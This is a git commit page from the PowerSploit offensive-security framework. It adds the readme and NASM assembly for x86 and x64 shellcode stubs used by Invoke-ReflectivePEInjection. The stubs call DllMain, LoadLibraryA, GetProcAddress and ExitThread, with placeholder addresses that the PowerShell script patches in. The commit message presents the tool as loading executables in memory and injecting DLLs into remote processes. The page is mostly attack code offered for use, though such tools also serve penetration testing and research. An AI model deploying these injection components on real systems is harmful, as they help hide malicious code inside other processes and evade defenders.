diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2013-05-31 19:35:26 -0400 |
| commit | dfec277813bfbc956dcac45345a9158093d68343 (patch) | |
| tree | f205c4c4d6e81f33ace8086bbf63881ffc12dd51 /CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode | |
| parent | 6e5338c8a34ade0ec0a4704031109fb5187620f8 (diff) | |
| download | PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.tar.gz PowerSploit-dfec277813bfbc956dcac45345a9158093d68343.zip | |
Added Invoke-ReflectivePEInjection
Another awesome addition from Joe Bialek. Invoke-ReflectivePEInjection
is a vast improvement over Invoke-ReflectiveDllInjection. It adds the
following features:
* Now supports loading exe files in memory
* Supports reflective dll injection into a remote process
* Additional sample Visual Studio solutions
Diffstat (limited to 'CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode')
8 files changed, 160 insertions, 0 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt new file mode 100644 index 0000000..1454ca8 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt @@ -0,0 +1,12 @@ +This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning. + +Compile: +x64: +nasm -f elf64 FileName.asm +ld -o FileName FileName.o +objdump -M intel -d FileName + +x86: +nasm FileName.asm +ld -o FileName FileName.o +objdump -M intel -d FileName
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm new file mode 100644 index 0000000..02d6848 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm @@ -0,0 +1,20 @@ +[SECTION .text] +global _start + +_start: + ; Get stack setup + push rbx + mov rbx, rsp + and sp, 0xff00 + + ; Call DllMain + mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell + mov rdx, 0x1 ; PROCESS_ATTACH + mov r8, 0x0 ; NULL + mov rax, 0x4141414141414141 ; Address of DllMain, set by PS + call rax + + ; Fix stack + mov rsp, rbx + pop rbx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm new file mode 100644 index 0000000..d16cbc9 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm @@ -0,0 +1,14 @@ +[SECTION .text] + +global _start + +_start: + ; Set a var to 1, let PS known exe is exiting + mov rbx, 0x4141414141414141 + mov [rbx], byte 0x01 + + ; Call exitthread instead of exitprocess + sub rsp, 0xc0 + and sp, 0xFFf0 ; Needed for stack alignment + mov rbx, 0x4141414141414141 + call rbx diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm new file mode 100644 index 0000000..edeffd6 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm @@ -0,0 +1,27 @@ +[SECTION .text] + +global _start + +_start: + ; Save state of rbx and stack + push rbx + mov rbx, rsp + + ; Set up stack for function call to GetProcAddress + sub rsp, 0x20 + and sp, 0xffc0 + + ; Call getprocaddress + mov rcx, 0x4141414141414141 ; DllHandle, set by PS + mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS + mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS + call rax + + ; Store the result + mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS + mov [rcx], rax + + ; Restore stack + mov rsp, rbx + pop rbx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm new file mode 100644 index 0000000..7f16471 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm @@ -0,0 +1,23 @@ +[SECTION .text] + +global _start + +_start: + ; Save rsp and setup stack for function call + push rbx + mov rbx, rsp + sub rsp, 0x20 + and sp, 0xffc0 + + ; Call LoadLibraryA + mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS + mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS + call rdx + + mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS + mov [rdx], rax + + ; Fix stack + mov rsp, rbx + pop rbx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm new file mode 100644 index 0000000..41b1034 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm @@ -0,0 +1,23 @@ +[SECTION .text] +global _start + +_start: + ; Get stack setup + push ebx + mov ebx, esp + and esp, 0xfffffff0 + + ; Call DllMain + mov ecx, 0x41414141 ; DLLHandle, set by PowerShell + mov edx, 0x1 ; PROCESS_ATTACH + mov eax, 0x0 ; NULL + push eax + push edx + push ecx + mov eax, 0x41414141 ; Address of DllMain, set by PS + call eax + + ; Fix stack + mov esp, ebx + pop ebx + ret diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm new file mode 100644 index 0000000..ce66543 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm @@ -0,0 +1,13 @@ +[SECTION .text] +global _start + +_start: + ; Set a var to 1, let PS know the EXE is exiting + mov ebx, 0x41414141 + mov [ebx], byte 0x01 + + ; Call exitthread instead of exit process + sub esp, 0x20 + and esp, 0xFFFFFFc0 ; Needed for stack alignment + mov ebx, 0x41414141 + call ebx diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm new file mode 100644 index 0000000..bf2ac9e --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm @@ -0,0 +1,28 @@ +[SECTION .text] + +global _start + +_start: + ; Save state of ebx and stack + push ebx + mov ebx, esp + + ; Align stack + and esp, 0xffffffc0 + + ; Call GetProcAddress + mov eax, 0x41414141 ; DllHandle, supplied by PS + mov ecx, 0x41414141 ; Function name, supplied by PS + push ecx + push eax + mov eax, 0x41414141 ; GetProcAddress address, supplied by PS + call eax + + ; Write GetProcAddress return value to an address supplied by PS + mov ecx, 0x41414141 ; Address supplied by PS + mov [ecx], eax + + ; Fix stack + mov esp, ebx + pop ebx + ret |